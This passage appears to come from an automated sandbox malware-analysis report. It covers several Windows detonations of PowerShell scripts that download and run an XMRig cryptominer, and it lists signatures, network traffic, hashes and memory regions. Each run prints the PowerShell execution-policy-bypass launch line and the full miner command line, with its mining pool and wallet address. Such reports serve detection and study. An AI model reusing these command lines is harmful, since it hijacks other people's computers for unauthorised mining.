| US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| NL | 23.62.61.121:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 121.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.251.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | udp |
Files
memory/4600-0-0x00007FFE80DA3000-0x00007FFE80DA5000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fnqvcxaz.slc.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4600-10-0x00000178BE650000-0x00000178BE672000-memory.dmp
memory/4600-11-0x00007FFE80DA0000-0x00007FFE81861000-memory.dmp
memory/4600-12-0x00007FFE80DA0000-0x00007FFE81861000-memory.dmp
memory/4600-13-0x00007FFE80DA3000-0x00007FFE80DA5000-memory.dmp
memory/4600-14-0x00007FFE80DA0000-0x00007FFE81861000-memory.dmp
memory/4600-15-0x00007FFE80DA0000-0x00007FFE81861000-memory.dmp
memory/4600-17-0x00007FFE80DA0000-0x00007FFE81861000-memory.dmp
memory/4600-18-0x00000178BEA40000-0x00000178BEA52000-memory.dmp
memory/4600-19-0x00000178BEA20000-0x00000178BEA2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4088-50-0x000001C86A980000-0x000001C86A9A0000-memory.dmp
memory/4088-51-0x000001C86AAE0000-0x000001C86AB00000-memory.dmp
memory/4088-52-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-53-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-54-0x000001C86AB00000-0x000001C86AB20000-memory.dmp
memory/4088-55-0x000001C86AB20000-0x000001C86AB40000-memory.dmp
memory/4600-56-0x00007FFE80DA0000-0x00007FFE81861000-memory.dmp
memory/4088-57-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-58-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-59-0x000001C86AB00000-0x000001C86AB20000-memory.dmp
memory/4088-60-0x000001C86AB20000-0x000001C86AB40000-memory.dmp
memory/4088-61-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-62-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-63-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-64-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-65-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-66-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-67-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-68-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-69-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-70-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-71-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-72-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-73-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-74-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-75-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-76-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-77-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-78-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-79-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-80-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-81-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
memory/4088-82-0x00007FF7954A0000-0x00007FF7960D3000-memory.dmp
Analysis: behavioral24
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
299s
Max time network
262s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3092 wrote to memory of 684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3092 wrote to memory of 684 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 52.111.227.14:443 | tcp |
Files
memory/3092-0-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp
memory/3092-6-0x0000024B70D40000-0x0000024B70D62000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_riqwsc2u.sgx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3092-10-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/3092-11-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/3092-12-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/3092-13-0x00007FFBA8EB3000-0x00007FFBA8EB5000-memory.dmp
memory/3092-14-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/3092-15-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/3092-16-0x00007FFBA8EB0000-0x00007FFBA9972000-memory.dmp
memory/3092-18-0x0000024B70F30000-0x0000024B70F42000-memory.dmp
memory/3092-19-0x0000024B70F20000-0x0000024B70F2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/684-50-0x000001D2BCC30000-0x000001D2BCC50000-memory.dmp
memory/684-51-0x000001D2BCC70000-0x000001D2BCC90000-memory.dmp
memory/684-52-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-53-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-54-0x000001D2BCC90000-0x000001D2BCCB0000-memory.dmp
memory/684-55-0x000001D2BE560000-0x000001D2BE580000-memory.dmp
memory/684-56-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-57-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-58-0x000001D2BCC90000-0x000001D2BCCB0000-memory.dmp
memory/684-59-0x000001D2BE560000-0x000001D2BE580000-memory.dmp
memory/684-60-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-61-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-62-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-63-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-64-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-65-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-66-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-67-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-68-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-69-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-70-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-71-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-72-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-73-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-74-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-75-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-76-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-77-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-78-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-79-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-80-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
memory/684-81-0x00007FF7D11D0000-0x00007FF7D1E03000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win10-20240404-en
Max time kernel
297s
Max time network
274s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 5008 wrote to memory of 3308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 5008 wrote to memory of 3308 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
Files
memory/5008-3-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp
memory/5008-5-0x0000019FC9FD0000-0x0000019FC9FF2000-memory.dmp
memory/5008-8-0x0000019FCA180000-0x0000019FCA1F6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_agfay2mf.5qu.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/5008-9-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-18-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-25-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-29-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp
memory/5008-30-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-31-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp
memory/5008-51-0x0000019FCA160000-0x0000019FCA172000-memory.dmp
memory/5008-64-0x0000019FCA140000-0x0000019FCA14A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/3308-93-0x000001A6390C0000-0x000001A6390E0000-memory.dmp
memory/3308-94-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-95-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-96-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-97-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-98-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-99-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-100-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-101-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-102-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-103-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-104-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-105-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-106-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-107-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-108-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-109-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-110-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-111-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-112-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-113-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-114-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-115-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-116-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-117-0x00007FF621510000-0x00007FF622143000-memory.dmp
memory/3308-118-0x00007FF621510000-0x00007FF622143000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-05-22 20:13
Reported
2024-05-22 20:18
Platform
win11-20240508-en
Max time kernel
299s
Max time network
262s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3044 wrote to memory of 4580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3044 wrote to memory of 4580 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 249.197.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 185.199.110.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
Files
memory/3044-0-0x00007FF8AF123000-0x00007FF8AF125000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kbhz0mqf.pqx.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3044-9-0x00000227F1620000-0x00000227F1642000-memory.dmp
memory/3044-10-0x00007FF8AF120000-0x00007FF8AFBE2000-memory.dmp
memory/3044-11-0x00007FF8AF120000-0x00007FF8AFBE2000-memory.dmp
memory/3044-12-0x00007FF8AF120000-0x00007FF8AFBE2000-memory.dmp
memory/3044-13-0x00007FF8AF120000-0x00007FF8AFBE2000-memory.dmp
memory/3044-14-0x00007FF8AF120000-0x00007FF8AFBE2000-memory.dmp
memory/3044-15-0x00007FF8AF120000-0x00007FF8AFBE2000-memory.dmp
memory/3044-17-0x00000227F1B10000-0x00000227F1B22000-memory.dmp
memory/3044-18-0x00000227F1AF0000-0x00000227F1AFA000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4580-49-0x000001C4EF5B0000-0x000001C4EF5D0000-memory.dmp
memory/4580-50-0x000001C4EF5F0000-0x000001C4EF610000-memory.dmp
memory/4580-51-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-54-0x000001C4EF610000-0x000001C4EF630000-memory.dmp
memory/4580-53-0x000001C4EF630000-0x000001C4EF650000-memory.dmp
memory/4580-52-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-55-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-56-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
memory/4580-57-0x000001C4EF630000-0x000001C4EF650000-memory.dmp
memory/4580-58-0x000001C4EF610000-0x000001C4EF630000-memory.dmp
memory/4580-59-0x00007FF7F29A0000-0x00007FF7F35D3000-memory.dmp
